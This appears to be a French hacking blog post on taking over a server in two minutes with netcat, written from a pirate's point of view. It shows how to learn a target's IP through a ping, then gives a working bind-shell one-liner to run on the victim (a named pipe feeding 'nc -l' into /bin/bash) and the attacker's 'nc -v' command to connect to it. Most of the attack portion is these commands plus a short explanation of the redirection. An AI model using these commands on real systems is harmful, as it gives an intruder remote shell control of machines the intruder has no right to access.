[Hack] Prendre le contrôle d’un serveur en 2 mn avec NetCat
NC, petit utilitaire qui peut faire de la magie !!!
Petit utilitaire qui peut permettre par exemple de s’échanger des messages …
Mais aussi petit utilitaire qui peut ouvrir votre porte à n’importe quelle personne Malveillante…
Windows l’a bien compris, et le désactive par défaut … ainsi, libre à l’utilisateur, en connaissance de risque de l’activer …
NC ….
Comme j’ai pu vous le montrer précédemment, il est relativement simple de savoir qui vous ping …
Aussi, mettons-nous dans la peau d’un pirate qui souhaite récupérer la vraie IP de sa cible … en appliquant cette méthode : [Hack] Qui vous Ping ?!?
L’idée étant, qu’un pirate … parvienne à exécuter un ping vers son ordinateur / serveur, depuis la machine qu’il cible
ping 37.76.55.195
… S’il y parvient, il n’a plus qu’à attendre de recevoir le ping
Dès lors qu’il connaît l’adresse IP …
De la même manière qu’il est parvenu à exécuter le ping, il va exécuter la commande suivante sur la machine de sa victime :
rm backpipe -f;mknod backpipe p && nc -l 1234 0<backpipe | /bin/bash 1>backpipe
( 1234 étant un port pour l’exemple, vous pouvez en mettre un autre ;) )
Ce qui ouvrira les portes de sa victime (un Shell), et lui permettra d’avoir un contrôle total … ou presque …
Pour terminer … il n’aura plus qu’à exécuter cette commande depuis son ordinateur :
nc -v 74.37.55.159 1234
Ayant pour effet, de le connecter directement au Shell de l’hôte distant …
Plus dans le détail :
NC recevra du texte (les commandes envoyées par l’attaquant), il le redirigera alors vers l’interpréteur de commande, ici « /bin/bash ».
En recevant ce texte, bash l’exécutera, et la sortie (l’affichage) sera alors non pas affiché … mais redirigé vers l’attaquant …